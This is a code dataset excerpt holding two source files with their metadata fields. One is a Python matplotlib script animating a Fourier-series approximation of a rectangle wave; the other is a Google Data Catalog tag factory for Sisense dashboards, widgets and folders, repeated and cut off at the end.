SAMP_FREQ = 100 # Duration[s] TIME_LEN = 4 * PERIOD # TIME_NUM = math.floor(TIME_LEN * SAMP_FREQ) # 400 # Angle [rad] ANGLE = numpy.linspace(0, 2 * math.pi, SAMP_FREQ) # (100, 1) # Order of Fourier Series ORDER = numpy.array([1, 3, 5, 7, 9]) ORDER_MAT = numpy.matlib.repmat(ORDER, TIME_NUM, 1) # (400, 5) X_MAX = 1.2 Y_MAX = 1.2 X_MIN = -1.2 Y_MIN = -1.2 fig = plt.figure(figsize=[8.0, 8.0]) # 800 x 800 ax1 = fig.add_axes([0.04, 0.85, 0.14, 0.14]) ax1.set_xlim(X_MIN, X_MAX) ax1.set_ylim(Y_MIN, Y_MAX) ax2 = fig.add_axes([0.24, 0.85, 0.74, 0.14]) ax2.set_ylim(Y_MIN, Y_MAX) ax3 = fig.add_axes([0.04, 0.65, 0.14, 0.14]) ax3.set_xlim(X_MIN, X_MAX) ax3.set_ylim(Y_MIN, Y_MAX) ax4 = fig.add_axes([0.24, 0.65, 0.74, 0.14]) ax4.set_ylim(Y_MIN, Y_MAX) ax5 = fig.add_axes([0.04, 0.45, 0.14, 0.14]) ax5.set_xlim(X_MIN, X_MAX) ax5.set_ylim(Y_MIN, Y_MAX) ax6 = fig.add_axes([0.24, 0.45, 0.74, 0.14]) ax6.set_ylim(Y_MIN, Y_MAX) ax7 = fig.add_axes([0.04, 0.25, 0.14, 0.14]) ax7.set_xlim(X_MIN, X_MAX) ax7.set_ylim(Y_MIN, Y_MAX) ax8 = fig.add_axes([0.24, 0.25, 0.74, 0.14]) ax8.set_ylim(Y_MIN, Y_MAX) ax9 = fig.add_axes([0.24, 0.05, 0.74, 0.14]) ax9.set_ylim(Y_MIN, Y_MAX) images = [] for t0 in range(TIME_NUM): # Time [s] time_axis = numpy.arange(0, TIME_NUM).T / SAMP_FREQ # (400, ) time_axis = time_axis[::-1] t = numpy.arange(t0, t0 + TIME_NUM).T / SAMP_FREQ # (400, ) t = numpy.expand_dims(t, axis=1) # (400, 1) t_mat = numpy.matlib.repmat(t, 1, len(ORDER)) # (400, 5) # Fourier coefficients coef = 2 * PERIOD / (math.pi * ORDER) * \ numpy.cos(math.pi * ORDER) # Saw wav # coef = -PERIOD / (math.pi * ORDER) * numpy.cos(math.pi * ORDER) # Saw wave # phase on the circumference phi = 2 * math.pi * ORDER_MAT * t_mat / PERIOD # (400, 5) # unit circle circ = numpy.array([coef * numpy.cos(phi[TIME_NUM-1, :]), coef * numpy.sin(phi[TIME_NUM-1, :])]) # (2, 5, 5) sig = numpy.sum(numpy.matlib.repmat( coef, TIME_NUM, 1) * numpy.sin(phi), axis=1) # plot complex plane k=1 im = ax1.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax1.plot([0, circ[0, 0]], [0, circ[1, 0]], linestyle="-", color="b", marker="o", markerfacecolor="b", markersize=4) im += ax1.plot([circ[0, 0], X_MAX], [circ[1, 0], circ[1, 0]], linestyle=":", color="b", marker="o", markersize=4, markerfacecolor="b", linewidth=1) # plot signal k=1 im += ax2.plot(time_axis, coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot complex plane k = 2 im += ax3.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax3.plot(coef[1] * numpy.cos(ANGLE) + circ[0, 0], coef[1] * numpy.sin(ANGLE) + circ[1, 0], color="k", linewidth=1.5) im += ax3.plot([0, circ[0, 0]], [0, circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax3.plot([circ[0, 0], circ[0, 1] + circ[0, 0]], [circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax3.plot([circ[0, 1] + circ[0, 0], X_MAX], [circ[1, 1] + circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle=":", marker="o", markerfacecolor="b", linewidth=1, markersize=4) # plot signal k = 2 im += ax4.plot(time_axis, coef[1] * numpy.sin(phi[:, 1]) + coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot complex plane k = 3 im += ax5.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax5.plot(coef[1] * numpy.cos(ANGLE) + circ[0, 0], coef[1] * numpy.sin(ANGLE) + circ[1, 0], color="k", linewidth=1.5) im += ax5.plot(coef[2] * numpy.cos(ANGLE) + circ[0, 0] + circ[0, 1], coef[2] * numpy.sin(ANGLE) + circ[1, 0] + circ[1, 1], color="k", linewidth=1.5) im += ax5.plot([0, circ[0, 0]], [0, circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax5.plot([circ[0, 0], circ[0, 1] + circ[0, 0]], [circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax5.plot([circ[0, 1] + circ[0, 0], circ[0, 2] + circ[0, 1] + circ[0, 0]], [circ[1, 1] + circ[1, 0], circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax5.plot([circ[0, 2] + circ[0, 1] + circ[0, 0], X_MAX], [circ[1, 2] + circ[1, 1] + circ[1, 0], circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle=":", marker="o", markerfacecolor="b", linewidth=1, markersize=4) # plot signal k = 3 im += ax6.plot(time_axis, coef[2] * numpy.sin(phi[:, 2]) + coef[1] * numpy.sin(phi[:, 1]) + coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot complex plane k = 4 im += ax7.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax7.plot(coef[1] * numpy.cos(ANGLE) + circ[0, 0], coef[1] * numpy.sin(ANGLE) + circ[1, 0], color="k", linewidth=1.5) im += ax7.plot(coef[2] * numpy.cos(ANGLE) + circ[0, 0] + circ[0, 1], coef[2] * numpy.sin(ANGLE) + circ[1, 0] + circ[1, 1], color="k", linewidth=1.5) im += ax7.plot(coef[3] * numpy.cos(ANGLE) + circ[0, 0] + circ[0, 1] + circ[0, 2], coef[3] * numpy.sin(ANGLE) + circ[1, 0] + circ[1, 1] + circ[1, 2], color="k", linewidth=1.5) im += ax7.plot([0, circ[0, 0]], [0, circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 0], circ[0, 1] + circ[0, 0]], [circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 1] + circ[0, 0], circ[0, 2] + circ[0, 1] + circ[0, 0]], [circ[1, 1] + circ[1, 0], circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 2] + circ[0, 1] + circ[0, 0], circ[0, 3] + circ[0, 2] + circ[0, 1] + circ[0, 0]], [circ[1, 2] + circ[1, 1] + circ[1, 0], circ[1, 3] + circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 3] + circ[0, 2] + circ[0, 1] + circ[0, 0], X_MAX], [circ[1, 3] + circ[1, 2] + circ[1, 1] + circ[1, 0], circ[1, 3] + circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle=":", marker="o", markerfacecolor="b", linewidth=1, markersize=4) # plot signal im += ax8.plot(time_axis, coef[3] * numpy.sin(phi[:, 3]) + coef[2] * numpy.sin(phi[:, 2]) + coef[1] * numpy.sin(phi[:, 1]) + coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot signal rectwave = -0.5 * numpy.sign(numpy.sin(2 * math.pi * t / PERIOD)) im += ax9.plot(time_axis, rectwave, linestyle="-", color="b", linewidth=1.5) images.append(im) ANIME = animation.ArtistAnimation(fig, images, interval=40) ANIME.save("rectangle_anime.mp4", writer="ffmpeg", dpi=300)
<filename>DigitalSignalProcessing/dsp_rectangle_anime.py<gh_stars>10-100 #!/usr/bin/env python """ 音声情報処理 n本ノック !! """ # MIT License # Copyright (C) 2020 by <NAME> # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # Commentary: # - 矩形波をフーリエ級数近似により作成する # - 近似の様子をアニメーションにより可視化 import math import numpy import numpy.matlib import matplotlib.pyplot as plt import matplotlib.animation as animation # Period [s] PERIOD = 1 # Sampling frequency for plot SAMP_FREQ = 100 # Duration[s] TIME_LEN = 4 * PERIOD # TIME_NUM = math.floor(TIME_LEN * SAMP_FREQ) # 400 # Angle [rad] ANGLE = numpy.linspace(0, 2 * math.pi, SAMP_FREQ) # (100, 1) # Order of Fourier Series ORDER = numpy.array([1, 3, 5, 7, 9]) ORDER_MAT = numpy.matlib.repmat(ORDER, TIME_NUM, 1) # (400, 5) X_MAX = 1.2 Y_MAX = 1.2 X_MIN = -1.2 Y_MIN = -1.2 fig = plt.figure(figsize=[8.0, 8.0]) # 800 x 800 ax1 = fig.add_axes([0.04, 0.85, 0.14, 0.14]) ax1.set_xlim(X_MIN, X_MAX) ax1.set_ylim(Y_MIN, Y_MAX) ax2 = fig.add_axes([0.24, 0.85, 0.74, 0.14]) ax2.set_ylim(Y_MIN, Y_MAX) ax3 = fig.add_axes([0.04, 0.65, 0.14, 0.14]) ax3.set_xlim(X_MIN, X_MAX) ax3.set_ylim(Y_MIN, Y_MAX) ax4 = fig.add_axes([0.24, 0.65, 0.74, 0.14]) ax4.set_ylim(Y_MIN, Y_MAX) ax5 = fig.add_axes([0.04, 0.45, 0.14, 0.14]) ax5.set_xlim(X_MIN, X_MAX) ax5.set_ylim(Y_MIN, Y_MAX) ax6 = fig.add_axes([0.24, 0.45, 0.74, 0.14]) ax6.set_ylim(Y_MIN, Y_MAX) ax7 = fig.add_axes([0.04, 0.25, 0.14, 0.14]) ax7.set_xlim(X_MIN, X_MAX) ax7.set_ylim(Y_MIN, Y_MAX) ax8 = fig.add_axes([0.24, 0.25, 0.74, 0.14]) ax8.set_ylim(Y_MIN, Y_MAX) ax9 = fig.add_axes([0.24, 0.05, 0.74, 0.14]) ax9.set_ylim(Y_MIN, Y_MAX) images = [] for t0 in range(TIME_NUM): # Time [s] time_axis = numpy.arange(0, TIME_NUM).T / SAMP_FREQ # (400, ) time_axis = time_axis[::-1] t = numpy.arange(t0, t0 + TIME_NUM).T / SAMP_FREQ # (400, ) t = numpy.expand_dims(t, axis=1) # (400, 1) t_mat = numpy.matlib.repmat(t, 1, len(ORDER)) # (400, 5) # Fourier coefficients coef = 2 * PERIOD / (math.pi * ORDER) * \ numpy.cos(math.pi * ORDER) # Saw wav # coef = -PERIOD / (math.pi * ORDER) * numpy.cos(math.pi * ORDER) # Saw wave # phase on the circumference phi = 2 * math.pi * ORDER_MAT * t_mat / PERIOD # (400, 5) # unit circle circ = numpy.array([coef * numpy.cos(phi[TIME_NUM-1, :]), coef * numpy.sin(phi[TIME_NUM-1, :])]) # (2, 5, 5) sig = numpy.sum(numpy.matlib.repmat( coef, TIME_NUM, 1) * numpy.sin(phi), axis=1) # plot complex plane k=1 im = ax1.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax1.plot([0, circ[0, 0]], [0, circ[1, 0]], linestyle="-", color="b", marker="o", markerfacecolor="b", markersize=4) im += ax1.plot([circ[0, 0], X_MAX], [circ[1, 0], circ[1, 0]], linestyle=":", color="b", marker="o", markersize=4, markerfacecolor="b", linewidth=1) # plot signal k=1 im += ax2.plot(time_axis, coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot complex plane k = 2 im += ax3.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax3.plot(coef[1] * numpy.cos(ANGLE) + circ[0, 0], coef[1] * numpy.sin(ANGLE) + circ[1, 0], color="k", linewidth=1.5) im += ax3.plot([0, circ[0, 0]], [0, circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax3.plot([circ[0, 0], circ[0, 1] + circ[0, 0]], [circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax3.plot([circ[0, 1] + circ[0, 0], X_MAX], [circ[1, 1] + circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle=":", marker="o", markerfacecolor="b", linewidth=1, markersize=4) # plot signal k = 2 im += ax4.plot(time_axis, coef[1] * numpy.sin(phi[:, 1]) + coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot complex plane k = 3 im += ax5.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax5.plot(coef[1] * numpy.cos(ANGLE) + circ[0, 0], coef[1] * numpy.sin(ANGLE) + circ[1, 0], color="k", linewidth=1.5) im += ax5.plot(coef[2] * numpy.cos(ANGLE) + circ[0, 0] + circ[0, 1], coef[2] * numpy.sin(ANGLE) + circ[1, 0] + circ[1, 1], color="k", linewidth=1.5) im += ax5.plot([0, circ[0, 0]], [0, circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax5.plot([circ[0, 0], circ[0, 1] + circ[0, 0]], [circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax5.plot([circ[0, 1] + circ[0, 0], circ[0, 2] + circ[0, 1] + circ[0, 0]], [circ[1, 1] + circ[1, 0], circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax5.plot([circ[0, 2] + circ[0, 1] + circ[0, 0], X_MAX], [circ[1, 2] + circ[1, 1] + circ[1, 0], circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle=":", marker="o", markerfacecolor="b", linewidth=1, markersize=4) # plot signal k = 3 im += ax6.plot(time_axis, coef[2] * numpy.sin(phi[:, 2]) + coef[1] * numpy.sin(phi[:, 1]) + coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot complex plane k = 4 im += ax7.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax7.plot(coef[1] * numpy.cos(ANGLE) + circ[0, 0], coef[1] * numpy.sin(ANGLE) + circ[1, 0], color="k", linewidth=1.5) im += ax7.plot(coef[2] * numpy.cos(ANGLE) + circ[0, 0] + circ[0, 1], coef[2] * numpy.sin(ANGLE) + circ[1, 0] + circ[1, 1], color="k", linewidth=1.5) im += ax7.plot(coef[3] * numpy.cos(ANGLE) + circ[0, 0] + circ[0, 1] + circ[0, 2], coef[3] * numpy.sin(ANGLE) + circ[1, 0] + circ[1, 1] + circ[1, 2], color="k", linewidth=1.5) im += ax7.plot([0, circ[0, 0]], [0, circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 0], circ[0, 1] + circ[0, 0]], [circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 1] + circ[0, 0], circ[0, 2] + circ[0, 1] + circ[0, 0]], [circ[1, 1] + circ[1, 0], circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 2] + circ[0, 1] + circ[0, 0], circ[0, 3] + circ[0, 2] + circ[0, 1] + circ[0, 0]], [circ[1, 2] + circ[1, 1] + circ[1, 0], circ[1, 3] + circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 3] + circ[0, 2] + circ[0, 1] + circ[0, 0], X_MAX], [circ[1, 3] + circ[1, 2] + circ[1, 1] + circ[1, 0], circ[1, 3] + circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle=":", marker="o", markerfacecolor="b", linewidth=1, markersize=4) # plot signal im += ax8.plot(time_axis, coef[3] * numpy.sin(phi[:, 3]) + coef[2] * numpy.sin(phi[:, 2]) + coef[1] * numpy.sin(phi[:, 1]) + coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot signal rectwave = -0.5 * numpy.sign(numpy.sin(2 * math.pi * t / PERIOD)) im += ax9.plot(time_axis, rectwave, linestyle="-", color="b", linewidth=1.5) images.append(im) ANIME = animation.ArtistAnimation(fig, images, interval=40) ANIME.save("rectangle_anime.mp4", writer="ffmpeg", dpi=300)
en
0.687849
#!/usr/bin/env python 音声情報処理 n本ノック !! # MIT License # Copyright (C) 2020 by <NAME> # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # Commentary: # - 矩形波をフーリエ級数近似により作成する # - 近似の様子をアニメーションにより可視化 # Period [s] # Sampling frequency for plot # Duration[s] # # 400 # Angle [rad] # (100, 1) # Order of Fourier Series # (400, 5) # 800 x 800 # Time [s] # (400, ) # (400, ) # (400, 1) # (400, 5) # Fourier coefficients # Saw wav # coef = -PERIOD / (math.pi * ORDER) * numpy.cos(math.pi * ORDER) # Saw wave # phase on the circumference # (400, 5) # unit circle # (2, 5, 5) # plot complex plane k=1 # plot signal k=1 # plot complex plane k = 2 # plot signal k = 2 # plot complex plane k = 3 # plot signal k = 3 # plot complex plane k = 4 # plot signal # plot signal
2.011335
2
google-datacatalog-sisense-connector/src/google/datacatalog_connectors/sisense/prepare/datacatalog_tag_factory.py
anugrah86/datacatalog-connectors-bi
27
6628989
#!/usr/bin/python # # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from datetime import datetime import re from typing import Any, Dict, List, Optional from google.cloud import datacatalog from google.cloud.datacatalog import Tag, TagTemplate from google.datacatalog_connectors.commons import prepare from google.datacatalog_connectors.sisense.prepare import \ constants, sisense_connector_strings_helper class DataCatalogTagFactory(prepare.BaseTagFactory): __INCOMING_TIMESTAMP_UTC_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ' def __init__(self, server_address: str): self.__server_address = server_address def make_tag_for_dashboard(self, tag_template: TagTemplate, dashboard_metadata: Dict[str, Any]) -> Tag: tag = datacatalog.Tag() tag.template = tag_template.name self._set_string_field(tag, 'id', dashboard_metadata.get('oid')) owner = dashboard_metadata.get('ownerData') if owner: self._set_string_field(tag, 'owner_username', owner.get('userName')) first_name = owner.get('firstName') or '' last_name = owner.get('lastName') or '' self._set_string_field(tag, 'owner_name', f'{first_name} {last_name}') folder = dashboard_metadata.get('folderData') if folder: # The root folder's ``oid`` field is not fulfilled. folder_id = folder.get('oid') or folder.get('name') self._set_string_field(tag, 'folder_id', folder_id) self._set_string_field(tag, 'folder_name', folder.get('name')) datasource = dashboard_metadata.get('datasource') if datasource: self._set_string_field(tag, 'datasource', datasource.get('title')) last_publish_time = dashboard_metadata.get('lastPublish') if last_publish_time: self._set_timestamp_field( tag, 'last_publish', datetime.strptime(last_publish_time, self.__INCOMING_TIMESTAMP_UTC_FORMAT)) last_opened_time = dashboard_metadata.get('lastOpened') if last_opened_time: self._set_timestamp_field( tag, 'last_opened', datetime.strptime(last_opened_time, self.__INCOMING_TIMESTAMP_UTC_FORMAT)) self._set_string_field(tag, 'server_url', self.__server_address) return tag def make_tags_for_dashboard_filters( self, jaql_tag_template: TagTemplate, dashboard_metadata: Dict[str, Any]) -> List[Tag]: tags = [] filters = dashboard_metadata.get( constants.DASHBOARD_FILTERS_FIELD_NAME) if not filters: return tags for dashboard_filter in filters: tags.extend( self.__make_tags_for_jaql(jaql_tag_template, dashboard_filter.get('jaql'), constants.ENTRY_COLUMN_FILTERS)) return tags def make_tag_for_folder(self, tag_template: TagTemplate, folder_metadata: Dict[str, Any]) -> Tag: tag = datacatalog.Tag() tag.template = tag_template.name # The root folder's ``oid`` field is not fulfilled. folder_id = folder_metadata.get('oid') or folder_metadata.get('name') self._set_string_field(tag, 'id', folder_id) parent = folder_metadata.get('parentFolderData') if parent: self._set_string_field(tag, 'parent_id', parent.get('oid')) self._set_string_field(tag, 'parent_name', parent.get('name')) owner = folder_metadata.get('ownerData') if owner: self._set_string_field(tag, 'owner_username', owner.get('userName')) first_name = owner.get('firstName') or '' last_name = owner.get('lastName') or '' self._set_string_field(tag, 'owner_name', f'{first_name} {last_name}') child_folders = folder_metadata.get('folders') child_count = len(child_folders) if child_folders else 0 self._set_bool_field(tag, 'has_children', child_count > 0) if child_count: self._set_double_field(tag, 'child_count', child_count) dashboards = folder_metadata.get('dashboards') dashboard_count = len(dashboards) if dashboards else 0 self._set_bool_field(tag, 'has_dashboards', dashboard_count > 0) if dashboard_count: self._set_double_field(tag, 'dashboard_count', dashboard_count) self._set_string_field(tag, 'server_url', self.__server_address) return tag def make_tag_for_widget(self, tag_template: TagTemplate, widget_metadata: Dict[str, Any]) -> Tag: tag = datacatalog.Tag() tag.template = tag_template.name self._set_string_field(tag, 'id', widget_metadata.get('oid')) self._set_string_field(tag, 'type', widget_metadata.get('type')) self._set_string_field(tag, 'subtype', widget_metadata.get('subtype')) owner = widget_metadata.get('ownerData') if owner: self._set_string_field(tag, 'owner_username', owner.get('userName')) first_name = owner.get('firstName') or '' last_name = owner.get('lastName') or '' self._set_string_field(tag, 'owner_name', f'{first_name} {last_name}') dashboard = widget_metadata.get('dashboardData') self._set_string_field(tag, 'dashboard_id', dashboard.get('oid')) self._set_string_field(tag, 'dashboard_title', dashboard.get('title')) datasource = widget_metadata.get('datasource') if isinstance(datasource, dict): self._set_string_field(tag, 'datasource', datasource.get('title')) elif isinstance(datasource, str): self._set_string_field(tag, 'datasource', datasource) self._set_string_field(tag, 'server_url', self.__server_address) return tag def make_tags_for_widget_fields( self, jaql_tag_template: TagTemplate, widget_metadata: Dict[str, Any]) -> List[Tag]: tags = [] if not (widget_metadata.get('metadata') and widget_metadata['metadata'].get('panels')): return tags panels = widget_metadata['metadata']['panels'] fields = [ panel for panel in panels if not panel.get('name') == constants.WIDGET_FILTERS_PANEL_NAME ] if not fields: return tags for field in fields: for item in field.get('items'): tags.extend( self.__make_tags_for_jaql(jaql_tag_template, item.get('jaql'), constants.ENTRY_COLUMN_FIELDS)) return tags def make_tags_for_widget_filters( self, jaql_tag_template: TagTemplate, widget_metadata: Dict[str, Any]) -> List[Tag]: tags = [] if not (widget_metadata.get('metadata') and widget_metadata['metadata'].get('panels')): return tags panels = widget_metadata['metadata']['panels'] filters = next( (panel.get('items') for panel in panels if panel.get('name') == constants.WIDGET_FILTERS_PANEL_NAME), None) if not filters: return tags for widget_filter in filters: tags.extend( self.__make_tags_for_jaql(jaql_tag_template, widget_filter.get('jaql'), constants.ENTRY_COLUMN_FILTERS)) return tags def __make_tags_for_jaql(self, tag_template: TagTemplate, jaql_metadata: Dict[str, Any], column_prefix: str) -> List[Tag]: tags = [] if not jaql_metadata: return tags tag = datacatalog.Tag() tag.template = tag_template.name dim_table = None dim_column = None dimension = jaql_metadata.get('dim') if dimension: self._set_string_field(tag, 'dimension', dimension) # According to the Sisense Support Team, JAQL objects should # contain the ``table`` and ``column`` fields, but we have seen # some cases in which it does not happen -- e.g.: dashboards that # were created a long time ago and migrated from version to # version, as well as from platform to platform (Windows to Linux), # have the ``dim`` field, but not ``table`` and ``column``. So, we # decided to scrape table and column metadata from the dimension # when the appropriate fields are not available to avoid losing # relevant lineage information. A regex is used to do so. dim_match = re.search(r'^\[(?P<table>.*)\.(?P<column>.*)]$', dimension) dim_table = dim_match.group('table') dim_column = dim_match.group('column') self._set_string_field(tag, 'table', jaql_metadata.get('table') or dim_table) self._set_string_field(tag, 'column', jaql_metadata.get('column') or dim_column) formula = jaql_metadata.get(constants.JAQL_FORMULA_FIELD_NAME) context = jaql_metadata.get(constants.JAQL_CONTEXT_FIELD_NAME) human_readable_formula = formula # The formula and its fields (aka parts) are stored in distinct fields, # ``formula`` and ``context``. The below code seeks to replace the part # identifiers, usually system-generated strings, with the part titles, # which are human-readable strings. On success, the resulting formula # is equal to what Sisense shows to users in the UI. if formula and context: parts = re.findall(r'\[(.*?)]', formula) for part in parts: part_metadata = context.get(f'[{part}]') if not part_metadata: continue part_title = part_metadata.get('title') if part_title: human_readable_formula = human_readable_formula.replace( part, part_title) self._set_string_field(tag, 'formula', human_readable_formula) self._set_string_field(tag, 'aggregation', jaql_metadata.get('agg')) self._set_string_field(tag, 'server_url', self.__server_address) title = jaql_metadata.get('title') subcolumn_name = sisense_connector_strings_helper\ .SisenseConnectorStringsHelper.format_column_name(title) tag.column = f'{column_prefix}.{subcolumn_name}' tags.append(tag) tags.extend( self.__make_tags_for_jaql_formula(tag_template, jaql_metadata, tag.column)) filter_by_tag = self.__make_tag_for_jaql_filter_by( tag_template, jaql_metadata, tag.column) if filter_by_tag: tags.append(filter_by_tag) return tags def __make_tags_for_jaql_formula(self, tag_template: TagTemplate, jaql_metadata: Dict[str, Any], column_prefix: str) -> List[Tag]: tags = [] formula = jaql_metadata.get(constants.JAQL_FORMULA_FIELD_NAME) context = jaql_metadata.get(constants.JAQL_CONTEXT_FIELD_NAME) if not (formula and context): return tags parts = re.findall(r'\[(.*?)]', formula) for part in parts: tags.extend( self.__make_tags_for_jaql( tag_template, context.get(f'[{part}]'), f'{column_prefix}.{constants.ENTRY_COLUMN_FORMULA}')) return tags def __make_tag_for_jaql_filter_by(self, tag_template: TagTemplate, jaql_metadata: Dict[str, Any], column_prefix: str) -> Optional[Tag]: jaql_filter = jaql_metadata.get(constants.JAQL_FILTER_FIELD_NAME) if not jaql_filter: return tags = self.__make_tags_for_jaql( tag_template, jaql_filter.get(constants.JAQL_FILTER_BY_FIELD_NAME), f'{column_prefix}.{constants.ENTRY_COLUMN_FILTER_BY}') return tags[0] if tags else None
#!/usr/bin/python # # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from datetime import datetime import re from typing import Any, Dict, List, Optional from google.cloud import datacatalog from google.cloud.datacatalog import Tag, TagTemplate from google.datacatalog_connectors.commons import prepare from google.datacatalog_connectors.sisense.prepare import \ constants, sisense_connector_strings_helper class DataCatalogTagFactory(prepare.BaseTagFactory): __INCOMING_TIMESTAMP_UTC_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ' def __init__(self, server_address: str): self.__server_address = server_address def make_tag_for_dashboard(self, tag_template: TagTemplate, dashboard_metadata: Dict[str, Any]) -> Tag: tag = datacatalog.Tag() tag.template = tag_template.name self._set_string_field(tag, 'id', dashboard_metadata.get('oid')) owner = dashboard_metadata.get('ownerData') if owner: self._set_string_field(tag, 'owner_username', owner.get('userName')) first_name = owner.get('firstName') or '' last_name = owner.get('lastName') or '' self._set_string_field(tag, 'owner_name', f'{first_name} {last_name}') folder = dashboard_metadata.get('folderData') if folder: # The root folder's ``oid`` field is not fulfilled. folder_id = folder.get('oid') or folder.get('name') self._set_string_field(tag, 'folder_id', 